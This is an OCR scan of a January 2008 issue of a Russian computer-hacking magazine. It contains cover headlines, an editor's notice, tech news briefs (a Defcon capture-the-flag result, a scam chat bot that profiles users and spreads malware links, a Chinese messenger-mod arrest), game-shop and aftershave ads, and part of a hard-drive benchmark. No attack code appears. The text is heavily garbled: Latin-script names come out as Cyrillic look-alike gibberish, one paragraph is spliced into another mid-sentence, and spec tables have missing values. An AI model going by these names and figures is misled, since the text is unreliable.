Ж У 



НАЛ 



О Т 



КОМПЬЮТЕРНЫХ 



ХУЛИГАНОВ 




ѴѴѴѴѴѴ.ХАКЕР.РІ) 



ЯНВАРЬ 01 109 2008 



ВЗЛОМ И ЗАЩИТА 
ПОПУЛЯРНОЙ 

СУБД СТР. 72 



ПУТЬ К СВЕТУІ 



ТЕСТИРОВАНИЕ 

ВМЕСТИТЕЛЬНЫХ 

НйО СТР. 14 



ВЗЛОМ 

МАРШРУТИЗАТО- 
РОВ СІ5С0 стр. 66 



ПЕРЕПРОШИВКА 
АППАРАТНЫХ 
ОѴО-ПЛЕЕРОВ 
С НИКСАМИ 

НА БОРТУ СТР. 90 



ИЗГОТОВЛЕНИЕ 

РОБОТА-УБИЙЦЫ 

ЗА 5 МИНУТ СТР. 126 



іиптета 



БОЛЬШИЕ ДИСКИ, УК РОЩЕНИЕ I 

Ѵ^ЛИКОИ КИСКИ 



РАЗОРУЖЕНИЕ 



□ѴО-ПЛЕЕРОВ 



Зверские 



опыты 



над 



Огасіе 









БУТЫЛКА ЖУРНАЛ 

ДОЛГО ДУМАЛИ ВСЕЙ РЕДАКЦИЕЙ, ЧТО БЫ ТА- 
КОГО ПОСЛЕ НОВОГО ГОДА УСТРОИТЬ ВЕСЕЛОГО. 
ДАВНО НЕ ТУСОВАЛИСЬ С ЧИТАТЕЛЯМИ. РЕШЕ- 
НИЕ ПРИШЛО В ФОРМАТЕ МЕГААКЦИИ: «ПРИНЕ- 
СИ БУТЫЛКУ - ПОЛУЧИ "ХАКЕР"». СУТЬ ОПЕРА- 
ЦИИ ПРОСТА, КАК ДВА РУБЛЯ. 

С 28 до 31 января приходи в редакцию во второй 
половине дня по адресу ул. Льва Толстого, д. 18Б, 
принеси с собой бутылку или банку любого напит- 
ка на твой вкус и получи из наших рук журнал с ав- 
тографами, а также возможность завладеть одним 
из двадцати очень ценных и символичных призов, 
наименование которых позволю себе удержать в 
тайне для эффекта неожиданности. 



При выборе бутылки учти: многие в редакции вообще не пьют ничего спиртного. 
До встречи. 

пікііогг, главред ][ 
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Ветер в харю 

На проходившей в Москве презентации игрового комплекта акустики 
атВХ компания РЫИрз проводила небольшой турнир по (^иаке IV. Доблес- 
тно отстояв честь журнала, я занял в турнире первое место и стал счаст- 
ливым обладателем премиум-комплекта. Он представляет собой целый 
набор новых способов погружения в виртуальную реальность. Помимо 
двух колонок и сабвуфера имеется встроенная система динамической 
подсветки пространства вокруг монитора. Две лампы находятся в боковых 
колонках и еще три в специальной панели, которую необходимо уста- 
навливать позади монитора. Принцип работы примерно такой же, каку 
некоторых телевизоров РЫИрз, — цвет освещения меняется в зависимости 
от картинки на мониторе. Только светом дело не ограничивается — в ком- 
плекте идут два вентилятора, которые в зависимости от игровой ситуации 
могут обдать лицо геймера потоком воздуха. Еще присутствует подставка 
для рук, которую нужно класть перед клавиатурой. Она вибрирует в такт 
свирепствующим в виртуальном мире взрывам. Лично протестировав уст- 
ройство на играх из комплекта поставки и на паре игр из своей коллекции, 
я остался вполне доволен, особенно порадовали потоки воздуха в лицо. А 
когда при запуске игры на экране появляется заставка Мѵісііа и при этом 
все вокруг мерцает разными цветами, вибрирует стол и в лицо дует ветер, 



ДМИТРИЙ ТРАВИН 
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уже сразу готовишься к новым ощущениям от игрового процесса. Качество 
звука тоже не подкачало — сабвуфера и двух колонок вполне достаточно 
для человека, который сидит непосредственно перед ними. Стоит также 
отметить и добротность изготовления комплекта — пластик на вид и 
на ощупь оставляет приятное впечатление; все поверхности, которые 
соприкасаются со столом, прорезинены, и поэтому все элементы прочно 
стоят на своих местах. Из недостатков можно назвать шум, который идет от 
вентиляторов, а особенно от вибрирующей подставки — она просто непри- 
лично громко громыхает. Есть несколько вариантов поставки: от базового 
комплекта за 9000 рублей, в который входит только подсветка, до премиум 
за 15 000, включающего подсветку, колонки, вентиляторы и подставку. 




Южноафриканский медиахолдинг Казрегз Ілтйесі купил 2 , 6 % интернет-портала 
Маіі.ги за $26 миллионов • В результате вся стоимость Маіі.ги оценивается в 
$1 миллиард. Это рекордная стоимость актива в русском интернете. 



Тостер для жестких дисков 



Компания Зйагкооп представила интересное устройство 
для тех людей, которым часто приходится подключать 
жесткие диски к своему компьютеру. С виду это похожая 
на тостер док-станция, которая подключается к компью- 
теру через ІІ5В 2.0. Сверху в устройство можно вставить 
2,5- или 3,5-дюймовый ЗАТА-диск, который зафиксиру- 
ется и благополучно появится как доступный в списке 
внешних дисков на твоем компе. Чтобы изъять диск, 
достаточно нажать кнопку извлечения на девайсе. При 



частых подключениях разных дисков такое устройство 
будет намного удобнее обычных внешних боксов, кото- 
рые необходимо разбирать, нередко откручивая несколь- 
ко винтов для установки нового харда. Кому во времена 
гигабайтных флешек и трЗ -плееров с жесткими дисками 
необходимо таскать обычные харды к себе домой, да еще 
и часто, непонятно, но наверняка такие люди есть. Если 
вдруг ты один из них, обрати внимание на этот девайс. Он 
называется ЗАТА (^иіскРогі: и стоит порядка 25 евро. 
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«Бронзовые» хакеры 

В Лас-Вегасе прошло очередное соревнование хакеров СарШге ТЪе 
Р1а§, организаторами которого являются члены комитета конфе- 
ренции хакеров Пеісоп. Наша команда НаскегОот из Уральского 
государственного университета заняла третье место. Победителем 
стала итальянская команда СЪосоІаіе Макегз из Миланского универси- 
тета, а на втором месте немцы Здиагегооіз из Университета Мангейма. 
Группам давалось чуть менее 7 часов для того, чтобы найти по одной 
уязвимости в семи сервисах, подготовленных для состязания. Допол- 
нительные очки можно было заработать, написав патч, исправляющий 
ошибку на сервисе, и сделав копирование и шифрование данных. 
Победившая в прошлом году команда из Вены ѴѴе_0ѵ\/п_У0и заняла 
четвертое место. В конкурсе также участвовали, но не заняли никаких 
призовых мест такие известные команды, как Іпбіа апб іЬе СгаЪат 
Сгаскегз из Пенсильванского университета, Оо5 ПеѵіІ2 из Амритской 
школы инженеров Атгйаригі и НехасІесітаіогБ из Калифорнийского 
университета в Санта-Барбаре. 




По результатам исследования компаний ІМокіа и ТЪе Ришге ЬаЪогаіогу, в 17 странах в 
2012 ГОДУ 25% всего развлекательного контента будет создаваться пользователями 




Т юрьма за улучшение 
программы 

В Китае самым популярным интернет-мессенджером является (2(2, 
разрабатываемый корпорацией Тепсет НоМіп^з. Мессенджер очень 
популярен — им пользуется около 40,6 миллиона человек. Но 28-летне- 
му преподавателю вуза Чэнь Шоуфу (СЪеп ЗЪоиІи) программа не очень 
нравилась, и он решил немного подправить ее, улучшив функционал и 
исправив пару багов. При этом еще он вырезал рекламу и сделал откры- 
тыми некоторые платные функции. Например, показ ІР отправителя 
сообщения, за который надо платить 1,35 доллара в месяц. Дистрибутив 
получил название Согаі (2(2. Чэнь пытался заработать немного денег 
на рекламе и спаме. Но корпорации Тепсепі; Ноісііп^з все это очень не 
понравилось, и первым судебным процессом она заставила препода- 
вателя заплатить штраф в размере 100 тысяч юаней (около $13 600) . 
После этого Чэнь стал на родине практически героем, поскольку многие 
китайцы не любят корпорацию за монополию на рынке. Но на этом все 
не закончилось, и после второго судебного процесса Чэнь Шоуфу был 
арестован и отправлен за решетку. А ведь хотел как лучше... 

С начала 2007 года в интернете 
появилось 20 миллионов НОВЫХ 
сайтов. 



Наезды на ѴоиТиЬе дали 

В прошлом номере я освещал новость про стрельбу в одной из школ Фин- 
ляндии, когда преступник сначала выложил видео с фотографией школы 
и со своей физиономией в обнимку с пистолетом на УоиТиЪе. Тогда было 
много шума из-за того, что админы УоиТиЪе не углядели злого умысла в 
этом видео и не предупредили полицейских. Казалось бы, пересмотреть 
тысячи записей, которые ежедневно присылают на сервис, практи- 
чески невозможно. Однако полиции Норвегии удалось предотвратить 
вооруженное нападение на школу в маленьком городке Эрдал, причем 
злоумышленник был найден как раз через УоиТиЪе. Молодой преступ- 
ник явно намекал на проишествие в Финляндии, разместив ссылки на 



ПЛОДЫ 



Ѵои 



ТиЬе 



трагические события 
в той школе. Помимо 
этого, он не поле- 
нился запечатлеть и 
свое лицо с угрозами 
в адрес уже своей 
школы. Полиция 

довольно быстро задержала злоумышленника и приступила к следствию. 
Оказывается, пересматривая тысячи видеозаписей, можно сохранить 
жизни паре десятков невинных людей. 



Вгоасісааі ѴоигзеІГ 
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ВОР#### 

ВеіегзгіогТ 



ВОССТАНАВЛИВАЮЩИЙ БАЛЬЗАМ 
ПОСЛЕ БРИТЬЯ 

• активизирует естественные защитные функции 
КОЖИ С ПОМОЩЬЮ НОВОЙ формулы сакерко53* 

° * • мгновенно успокаивает и восстанавливает 

кожу после бритья 

• обеспечивает оптимальную защиту 
и ощущение комфорта 

• в отличие от спиртосодержащих лосьонов 
не сушит и не жжет кожу 

НІУЕА РОВ МЕН - № 1 В РОССИИ 



ТЕПЕРЬ ТОЛЬКО 

ПРИЯТНЫЕ ОЩУЩЕНИЯ 



СРЕДИ СРЕДСТВ ПОСЛЕ БРИТЬЯ ** 

МГУПѴ.МІУЕА.РІІ * формула КЕА ПРОТЭК ** по данным компании АСЫіеІзеп 
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Википедия будет 
платить авторам 

Профессор Массачусетского технологического университета Филипп 
Гринспун (РЫНр Сгеепзрші) сравнил Википедию и энциклопедию 
«Британика» и сделал выводы, что хоть Википедия и выигрывает по 
освещению новых событий, Британика все равно выглядит лучше 
благодаря своим более качественным иллюстрациям к статьям. Решив 
исправить положение вещей, он перечислил 20 тысяч долларов в фонд 
ѴѴікітебіа РоипбаНоп, который управляет Википедией. На эти деньги 
он посоветовал фонду приобрести профессиональные иллюстрации 
к основным статьям. Фонд принял предложение и отобрал 50 статей, 
к которым всем желающим предлагается присылать готовые работы. 

Из них будут отобраны лучшие и их авторы получат по 40 долларов. 

Впервые за всю историю энциклопедии ее авторы получат денежное 
вознаграждение за свои труды. Возможно, это станет поводом для 
оплаты и качественных текстов на сложные научные или другие темы, 
авторы которых смогут предоставить достоверную и уникальную 
информацию. 

Кубику Рубика исполнилось 30 лет . За время его существования было продано более 
300 миллионов экземпляров и около 500 миллионов подделок. 

Водяные знаки для 
фильмов 

Интересный способ борьбы с видеопиратством предложила компания 
МйзиЬізЫ Еіесітіс. Суть способа заключается в том, чтобы в каждый 
фильм включать скрытые водяные знаки, которые накладывались бы 
поверх изображения и содержали название кинотеатра и время пока- 
за, но человеческому глазу были бы не видны и просмотру не мешали. 
Если кинцо кто-то снимет на камеру, то эти знаки также запишутся. 
Потом с помощью специальной проги эти знаки смогут расшифровать 
и использовать как доказательство в суде. Только непонятно, как пи- 
ратов собираются ловить, ведь при покупке билета паспорт пока что 
не требуется, и найти того, кто же сидел с камерой в портфеле, будет 
сложно. С другой стороны, это борьба за качество пиратской продук- 
ции. Таким образом уменьшится число экранок, и все будут скачивать 
фильмы, рипнутые с ЭѴЭ-дисков. С метками или без — разницы для 
любителей халявы никакой. Будем с нетерпением ждать продолжения 
борьбы с пиратством в кинотеатрах. Может, скоро начнут ставить 
приборы, создающие помехи при записи на камеру в пределах зала. 





Необычная подработка 

Оказывается, не только в России учителя недовольны своей заработ- властями, говорится о том, что поведение Анны «несовместимо с 
ной платой и ищут разные способы подработки. В Италии школьная образовательным процессом», 

учительница Анна Чириани (Аппа Сігіапі) на досуге снималась в 
порнографии и участвовала во многих популярных эротических шоу. 

В интернете она была известна под именем МабатеѵѵеЪ. Сначала Анна 
преподавала итальянскую литературу в средней школе города Порде- 
нон, но ее ученики узнали о ее подработках и обклеили все туалеты 
школы ее фотками в непристойном виде. Это вынудило порноучи- 
тельницу переехать в соседний город и там преподавать на вечерних 
занятиях уже взрослым студентам. Но и это продолжалось недолго 
— училка спалилась в очень популярном в Сети видео с берлинского 
фестиваля эротики. В этот раз кадры с голой учительницей добрались 
и до властей, которые недолго думая отстранили Анну от препода- 
вательской деятельности. В официальных комментариях, данных 
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Топу Наѵѵк’з 
ОоѵѵпЫІІ Зат 
780 р. 



І_едепсі о! 7еІсіа: 
РІіапіот Ноигдіазз 
1352 р. 



СаІІ о! йиіу 4: 
Мосіегп ѴѴагІаге 
1482 р. 



Покупку можно оплатить 
электронными деньгами 



Возможность доставки 
в день заказа 



Специальная цена на прис- 
тавки при покупке 3-х игр 



Требуются курьеры! Достойные условия. 
Классный молодой коллектив. 

Звоните: +7 ( 495 ) 780 88 25 
или пишите: $аІе$@датеро$1.ги 



ХЬох 360 Ргетіит 

13780 р. 



РЗР ЗІіт & Ыіе 

7800 р. 



Все цены действительны на момент публикации рекламы 



ІМеесі Тог Зреесі Рго Ваісііеі & СІапк: Тооіз РІ РА 08 (В II 5) 
Зігееі (русская версия) о! Оезігисііоп (РАІ_) 

2210 р. 1950 р. 1508 р. 



І\ІіпІепсІо ѴѴіі 

9880 р. 



НЕ СКУЧАЙ! 
ДОМА И 
В ДОРОГЕ 

ИГРАЙ! 



15990 р. 



© Телефон: 
(495) 780-8825 

шѵт.датеро$1.ги 



Зеаппе й’агс 
1300 р. 



6АМЕР05Т 



РІауЗТаІіоп 2 ЗІіт 

481 0 р. 






РІауЗТаІіоп 3 (40 СВ) 



НаІоЗ 

2210 р. 



РіпаІ Рамазу XII 
1560 р. 



Капе & І_упсІі: 
ОеасІ Меп 

2080 р. 



Оапсе ІІКХІ_ РагТу 
& ЫЗВ МАТ ВипШе 

1690 р. 



Зііепі НіІІ Огідіпз 
1430 р. 



Неаѵепіу Зѵѵогсі 
(РАІ) 

1950 р. 



Ргсцес! боіііат 
Васіпд 4 

2210 р. 2210 р 



Аззаззіп’з Сгеесі 



Везісіепі ЕѵіІ 4 
ѴѴіі ЕсІШоп 
1482 р. 1950 р. 



Зирег Рарег Магіо 
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бОО^Іе обогнал Рамблер по трафику 

2-е место в рунете. 




Звезды не прочь 
погамиться 



Прелесть онлайновых игр в том, что никогда не знаешь, кто на самом деле сидит по 
ту сторону монитора. Глава гильдии вполне может оказаться 16-летним школьни- 
ком, а младшие члены этой же гильдии — взрослыми мужиками, возможно, даже 
занимающими высокие посты. Как выяснилось, троллем-магом, с которым ты 
вчера ходил в данжен, легко мог быть Жан-Клод Ван Дамм, который не стесняется 
рассказывать о своем увлечении ѴѴогЫ ОІѴѴагсгаН журналистам. Кроме него о 
своем неравнодушии к этой ММО заявил актер Мг.Т, играющий ночным эльфом, 
герой сериала ЗіагТгек Уильям Шетнер, успешно прокачивающий своего шамана, 
и испанский актер Вилли Толедо, играющий закованным в броню паладином. 
Конечно, эти заявления вполне могут быть просто проплаченным рекламным 
ходом компании Вііггагсі, и возможно, все эти знаменитости просто лукавят, глядя 
в камеру, но в форумах игры иногда проскакивает информация о присутствии в 
игровой вселенной и других знаменитостей. Кстати, в 2008 году весь ѴѴоѴѴ будет 
официально переведен на русский язык, и тогда, может быть, и наши звезды потя- 
нутся в онлайн. 



54 % европейских семей имеют доступ в интернет. 
А в Голландии — все 83 %. 



Приставка-доктор 



Размахивать джойстиком от приставки Мпіепсіо \Уіі, оказывается, не 
просто весело, но и полезно. Как установил один из терапевтов госпита- 
ля в штате Огайо, игра с улавливающим перемещения в пространстве 
джойстиком положительно сказывается на восстановлении после травм 
и ударов. Полтора часа игры 2-3 раза в неделю способны улучшить 
координацию движений, работу вестибулярного аппарата, а также 
силу и выносливость. Эту практику решили ввести как дополнение к 



обычному терапевтическому курсу. Но это не уникальный случай — до 
этого подобный способ лечения уже ввели в одной из канадских клиник. 
Думаю, стоит расширить рекомендации и заставить пациентов набирать 
определенное количество очков или выигрывать сложные чемпионаты. 
Чтобы было не простое развлечение, а реальное старание и труд. Только я 
слабо представляю, как какая-нибудь бабушка будет рубиться в виртуаль- 
ный теннис или мочить врагов самурайским мечом. 
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Почти бесплатно 

В декабре прошлого года стартовал второй сезон конкурса под 
названием МасНеізі.сот. Зарегистрировавшимся на этом сайте 
предлагалось разгадать набор головоломок, наградой за решение 
которых являлись ключи для активации шароварных программ для 
Маков. Стоит отметить, что головоломки довольно интересные: в 
первой миссии по подсказке нашелся торрент на одном известном 
трекере, который содержал зашифрованный образ и текстовый 
файл, написанный на одном из машинных языков. Далее текстовый 
файл можно было расшифровать онлайн-кодировщиком и продви- 
нуться в этой головоломке на одну ступеньку вперед. Дальше все 
проходило примерно в таком же духе. В ходе выполнения заданий 
участники могли открыто общаться на форумах и в ІКС-чате. Первый 
сезон проводился в декабря 2006 года, тогда в общей сложности было 
выиграно программ на сумму более 200 тысяч долларов. Вообще та- 
кой способ раздачи бесплатных лицензий на маковские программы 
довольно популярен, причем программы зачастую реально занят- 
ные и полезные: за первую миссию второго сезона МасНеізі: дают 
не очень интересную программу для учета новогодних подарков и 
крутой менеджер быстрого запуска программ ОѵегПоѵѵ. Обе стоят по 
15 долларов. 



Революция микрочипов 




Инженеры ІВМ изобрели новую технологию, которая позволит 
уместить тысячу процессоров в корпусе ноутбука. При этом энерго- 
потребление будет сравнимо с обычной лампой накаливания. Суть 



состоит в том, чтобы передавать электрические импульсы между 
ядрами и процессорами не по проводам, а используя свет. Уже раз- 
работан кремниевый электрооптический модулятор МасЬ-2е1іпсІег, 
который в сотни раз меньше своих аналогов. Он и позволяет преоб- 
разовывать электрические сигналы в пульсацию света. В качестве 
источника света используется луч лазера, а для передачи световых 
импульсов — кремниевый нанофотонный волновод. Модулятор в 
зависимости от сигнала либо открывается, пропуская луч света, либо 
закрывается. Соответственно, получается либо логическая едини- 
ца, либо ноль. Новая технология позволит уменьшить стоимость, 
энергопотребление и тепловыделение суперкомпьютеров. При этом 
пропускная способность между ядрами повысится в 100 и более раз. 
Рабочие образцы планируется создать за следующие 5 лет. 
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Л А ГіткЛ 1 

Новая Студия м ѴіяіаІ $1иаіо гоав 

Місгозоіі: Ѵізиаі Зшсііо 2008 — один из трех продуктов Місгозоіі:, официальный запуск которых 
в России намечен на 18 марта. На данный момент Студия уже полностью готова и с 19 ноября 
2007 года уже доступна всем подписчикам МЗОИ. Из основных нововведений стоит отметить 
работу с аппаратными графическими средствами, позволяющими создавать красивые и слож- 
ные графические эффекты для приложений, полную интеграцию с (Жісе, позволяющую на базе 
обычной таблицы Ехсеі реализовать довольно сложную логику, а также возможность создания 
веб-приложений с помощью технологии А1АХ. Появилась возможность совместной работы 
всех участников разработки, с помощью Ѵізиаі Зшбіо 2008 Теат Зузіет. Менеджеры, архитек- 
торы, дизайнеры, тестеры и разработчики баз данных могут взаимодействовать на всех этапах 
производственного процесса. Стоит отметить возможность выбора версии .ИЕТ Егатеѵѵогк, с 
которой будет вестись работа, улучшенный НТМЬ-редактор и новый визуальный редактор 
для ЗСД. 



Опасная 

девушка 

Компания РС Тооіз проводила проверку 
ІКС-каналов и нашла в русском сегменте 
интересный образец чат-бота под названи- 
ем СуЬегЬоѵег. При общении с программой 
создается ощущение разговора с девушкой, 
которая не прочь завязать отношения с 
собеседником. При этом у собеседницы есть 
две модели поведения: либо это романтичная 
девушка, либо просто сексуально озабочен- 
ная представительница слабого пола. При 
этом специалисты подчеркивают очень 
высокий коммуникативный уровень, демон- 
стрируемый ботом. За время общения на 
собеседника собирается своеобразное досье 





и отсылается владельцу бота. Кроме того, 
программа может подсунуть ссылку на якобы 
домашнюю страницу девушки, с которой 
можно нахватать много интересных вирусня- 
ков в коллекцию. Общением только с одним 
собеседником программа не ограничивается 
и вполне может поддерживать разговор и с 



несколькими жертвами. Пока за пределы ру- 
нета программа не вышла, но, по данным РС 
Тооіз, к февралю создатели готовятся выйти 
на мировой уровень. На сайте сѵЪегІоѵег.ги 
бот описывается как программа, которая за 
тебя может познакомиться с девушкой в чате, 
и продается за 25 долларов. 



75 % 

іаиаііиіШ ? 



покупателей іРііопе впервые становятся абонентами оператора 



02 



итании. Аналогичной цифры для американского 



іАТ&Ті 



нет, но они тоже 



заметили серьезное увеличение количества абонентов с начала продаж. 



Опалилась... 

Вернувшись из Ирака после целого года службы, один 
американских солдат отлично проводил время, радуясь 
домашнему печенью и наслаждаясь мягким креслом перед 
телевизором. Но решив поиграть в боулинг на любимой 
приставке Иіпііепсіо ѴУіі, он обнаружил в списке профилей 
какого-то непонятного мужика. Применив к жене методы 
дознания, которым он научился в армии, солдат выяснил, 
что та без него зря время не теряла и, пока муж бороздил на 
Хаммере пустыню, развлекалась на их супружеском ложе 
с другими мужиками. После одного такого развлечения 
любовник полез играться и создал новый профиль Міі. 
Такие профили используются для общения между владель- 
цами приставки и для записи рекордов и других успехов в 
играх. Этот профиль позволил установить не только сам 
факт присутствия постороннего человека, но и дату, когда 
он решил навестить его скучающую супругу. С неверной 
женой солдат жить не смог, и они сразу же расстались, 
подав документы на развод. 
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Первая заплатка 




ѴѴІпскм5\Лйа 



ИіпсІоѵюѴівкіЗРІ 



После выхода ѴѴіпсіоѵѵз ѴІБіа многие кричали о том, что продукт еще 
сырой и что они пересядут на новые окна только после выхода ЗР1. И 
вот ждать осталось совсем недолго — уже появился список измене- 
ний в релиз-кандидате первого сервис-пака. Из основных изменений 
стоит отметить улучшения в совместимости приложений, поддерж- 
ку некоторых новых технологий и стандартов, более качественное 
управление питанием, более высокую производительность и уровень 
безопасности. Из самого заметного после установки ЗР1 КС на тесто- 
вый ноутбук специалисты из ЗІазЬсІоі: подчеркнули уменьшение вре- 
мени загрузки примерно на 20 секунд. Никаких крупных изменений 
от сервис-пака ожидать не стоит, поэтому многие заявили, что теперь 
будут ждать появления ЗР2 и только тогда перейдут на Висту :). А еще 
— на сайте МісгобоК можно скачать некий ѴѴіпсіоѵѵб ѴібШ ЗР1 СиісіеБ 
Гог ІТ РгоГеББІопаІБ, в котором лежат текстовые файлы весом в 1,5 Мб. 
В настоящее время ведутся поиски людей, которые смогли прочитать 
его полностью... 





Определяя будущее 

27 и 28 ноября в Российской академии наук прошла девятая 
по счету конференция компании МісгобоК «Платформа 
2008. Определяя будущее». На конференции было прочита- 
но около 50 докладов, проведены круглые столы и органи- 
зованы лабораторные классы. Все это было нацелено на то, 
чтобы дать не только теоретические знания, но и практи- 
ческие навыки проектирования, реализации, внедрения, 
защиты и поддержки информационных систем на платфор- 
ме Місгозок. Были освещены технологии новой линейки 
продуктов Місгозок: ѴѴіпсІоѵѵз Зегѵег® 2008, ЗСД Зегѵег 
2008 и Ѵізиаі Зшсііо® 2008. Официальный запуск этих 
продуктов в России намечен на 18 марта 2008 года. Также 
впервые за историю конференции все доклады можно 
было посмотреть в режиме онлайн на сайте мероприятия 
р1агіогша2008.ги . Это было сделано потому, что количе- 
ство желающих посетить конференцию довольно сильно 
превысило количество мест. Кроме продуктов Місго$ок на 
мероприятии можно было ознакомиться с технологиями и 
разработками компаний-партнеров на их стендах. 



Терабайтный кирпич 



Компания ЬаСіе выпустила внешний накопитель с инте- 
ресным дизайном — это монолитный кирпич с блестяще- 
матовой поверхностью. Из выделяющихся элементов 
— только синяя подсветка на переднем плане и кнопка 
включения, решетка кулера и разъемы для проводов 
находятся сзади и не бросаются в глаза. По структуре пок- 
рытие устройства очень напоминает черную РІаузШіоп 
3 — отпечатки пальцев на нем остаются очень заметные, 
но лапать внешний жесткий диск необходимости нет. На- 
звание устройства сродни его внешнему виду — просто 
ЬаСіе Нагб Ні$к. В продаже эта работа известного дизай- 
нера Нила Поултона (Иеіі Роикоп) появится в январе и 
будет продаваться в двух вариантах. Младшая модель 
объемом 320 Гб будет стоить от 1 19 долларов. За старшую 
модель внушительного объема в 1 Тб придется выложить 
уже 399 долларов. 
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АНДРЕЙ КОСТРОВ 

Большие диски 

Тест НРР для взрослых 

На сегодняшний день жесткие диски емкостью 1 терабайт, которая еще недавно счита- 
лась фантастической, прочно вошли в наш быт. В этой статье мы рассмотрим и протес- 
тируем два терабайтных накопителя плюс несколько винчестеров чуть меньшей емкос- 
ти из доступных на рынке. 



Список протестированного оборудования: 




В МЕТОДИКА ТЕСТИРОВАНИЯ 

Измерение основных физических параметровтестируемыхжесткихдисков 
выполнялось при помощи двух программ. Пиковую скорость интерфейса (или 
скорость чтения из буфера) и время случайного доступа снимали при помощи 
программы НЮ ТасИ. Чтобы избежать неточности показаний, вышеописанный 
тест проделывался 5 раз, а полученные результаты усреднялись; средние 
значения считались итоговым результатом. Скорость последовательного 
чтения/записи и скорость случайного чтения/записи измерялись при помощи 
компонента Юізк ВепсЬтагк, входящей в состав программы диагностики 
І_аѵаІу5 Еѵегезі; фиксировалась максимальная, средняя и минимальная 
скорость записи/чтения. Чтобы оценить производительностьжесткого диска 
в операциях, максимально приближенных к повседневным, мы применили 
пять дисковыхтестов (ХР Зіагіир, Арріісаііоп Юоасііпд, бепегаі ІІзаде, Ѵігиз 



5сап и РІІеѴѴгііе) из популярного тестового пакета РСМагкОб. Для последу- 
ющихтестов использовалась программа ІОтеіег. Тесты проделывались для 
паттерна Рііе зегѵег. Применялись пять моделей доступа (Ііпеаг, ѵегу ІідЫ, ІідЫ, 
тосіегаіе, Ьеаѵу), которые характеризуют количество одновременных обра- 
щений ктестируемомужесткомудиску. Крометого, использовался паттерн 
МиШтебіа зіхеат, измеряющий эффективность работы накопителя с потоко- 
выми данными (втом числе и мультимедиа); параметр оШиізіапсІіпд І/Оз при 
этом выставлялся в значение 32. Для получения максимальных результатов 
тесты Іотеіеги РСМагкОб проделывались при активированном N00. На 
протяжении всего тестирования производился мониторингтемпературы 
при помощи программы йТеппр и фиксировалось максимальное значение. 
Оценка акустического шума, издаваемого устройством, производилась при 
отключенном вентиляторе блока питания для различных режимов работы 



РСМагк05 — Тест РіІеѴѴгіІе, Мб/с N00 ОЫ 




Максимальная температура (меньше — лучше) 




Терабайтный винтНііасИі НО572Ю10К1А330оказался самым горячим 
участником теста 
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Технические характеристики: 

Объем, Гб: 750 
Интерфейс: 5АТА300 



Скорость вращения, об/мин: 7200 
Объем кэш-памяти, Мб: ' 
Количество ДИСКОВ: 

Количество головок 
Поддержка N00: ес 
Размеры, мм: 101x26,1x146,99 
Масса, кг: 0,72 




О О 



Первый из протестированных накопителей производства Зеадаіе емкос- 
тью 750 Гб. Винт принадлежит ксемейству Ваггасиба Е5, и именно с него 
(а также с семейства Ваггасиба 7200.1 0) Зеадаіе первой начала выпуск 
серийных накопителей, использующихтехнологию перпендикулярной за- 
писи. Семейство Ваггасиба Е5 — это профессиональные накопители, пред- 
назначенные для использования в системах хранения данных и серверах 
начального уровня, то есть там, где требуется повышенная надежность от- 
носительно безкіор-винчестеров. Согласно резул ьтатам тестирования, де- 
вайс демонстрирует высокие значения скоростей последовательного чте- 
нияи записи. Не разочаровало и его время случайного чтения/записи, ну а 
скорость чтения из буфера оказалась максимальной среди исследованных 
устройств. Притестировании с помощью РСМагкОб накопительувереннее 
всего чувствовал себя втестах, критичных кскорости чтения/записи и 
чтения из буфера (то есть в Ѵігиз 5сап и Еііе ѴѴгіІе]. Производительность в 
Іотеіег никак нельзя считать сильной стороной устройства. При исполь- 
зовании паттерна Еііе зегѵег накопитель показал приемлемую производи- 
тельность только при моделях доступа с невысоким числом одновременных 
обращений, а результат при использовании паттерна МиШтебіа зігеат 
вообще оказался самым низким. Максимальнаятемпература составила 50 
градусов. В процессе работы отчетливо прослушивался шум от перемеще- 
ния магнитных головок при позиционировании на трек. 




Нііасііі Н 05721 01 0КІ.А330 



Технические характеристики: 

Объем, Гб: 1000 
Интерфейс: 5АТА300 
Скорость вращения, об/мин: 7200 
Объем кэш-памяти, Мб: 32 
Количество ДИСКОВ: 

Количество ГОЛОВОК: 1 С 
Поддержка N00: есть 
Размеры, мм: н/д 
Масса, кг: н/д 



•••••••••О 

На очереди жесткий диск производства японского концерна НІІасИІ. При 
изучении его технических характеристик бросается в глаза гигантская 
емкость и встроенный кэш объемом 32 Мб, хотя, на наш взгляд, для поль- 
зовательских задач такая емкость несколько избыточна. Для устройств 
производства НііасЬІ традиционным считается наличие двух коннекторов 
питания: 5АТА и стандартного тоіех (одновременное их использование за- 
прещено). Чтобы достигнуть емкости, равной 1 Тб, разработчику пришлось 
использовать 5 магнитных пластин с плотностью записи 188 Гб и 10 маг- 
нитных головок соответственно. Высокая плотность записи определила 
отличные результаты втестах, измеряющих скорость последовательного и 
случайного чтения/записи; время случайного доступа тоже выглядит весь- 
ма достойно. Правда, скорость чтения из буфера недотянула до 200 Мб/с, 
что низковато для винта, использующего интерфейс 5АТА300. Девайс 
отлично выглядел в РСМагк05, получив максимальную итоговую оценку 
среди протестированных накопителей. К плюсам также можно отнести ре- 
зультаттеста Іотеіегс паттерном МиШтебіа зШеат. Но притестировании 
в Іотеіегс использованием паттерна Еііе зегѵегжесткий диск выглядел 
довольно бледно. Максимальная температура винчестера составила 53 
градуса. Крометого, диск отличается достаточно шумным «характером» 
(возможно, сказалось большое количество магнитных дисков). 



Рііе зегѵег раііегп N00 ОЫ 



Пиковая скорость интерфейса Мб/с (больше — лучше) 



Той ІМ Ь/з 




По результатам теста Іотеіегс паттерном Еііе зегѵег, уверенно лидируют 
три жестких диска ѴѴезіегп Оідііаі 




Максимальная скорость чтения из буфера принадлежит Зеадаіе 
5Т375064(№5 
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НіІасНі НОТ725050ѴІ.А360 



Технические характеристики: 

Объем, Гб: 500 
Интерфейс: 5АТА300 
Скорость вращения, об/мин: 7200 
Объем кэш-памяти, Мб: 
Количество дисков: н/д 
Количество ГОЛОВОК: 

Поддержка N00: 

Размеры, мм: н 
Масса, кг: н/д 




ООО 



ѴѴезІегп Оідііаі Ш5000ААК5 



Технические характеристики: 

Объем, Гб: 500 
Интерфейс: 5АТА300 
Скорость вращения, об/мин: 7200 
Объем кэш-памяти, 

Количество ДИСКОВ: 

Количество ГОЛОВОК: 

Поддержка N00: 

Размеры, мм: н/, 

Масса, кг: н/д 




О О 



Это второй жесткий диск, разработанный НкасЫ, который мы представля- 
ем в сегодняшнем материале. Как и в случае старшей, терабайтной модели, 
на плате контроллера распаяны два коннектора питания: 5АТА и тоіех (это 
обстоятельство может пригодиться владельцам старых блоков питания). По 
результатам измерения скорости чтения и записи накопитель никак нельзя 
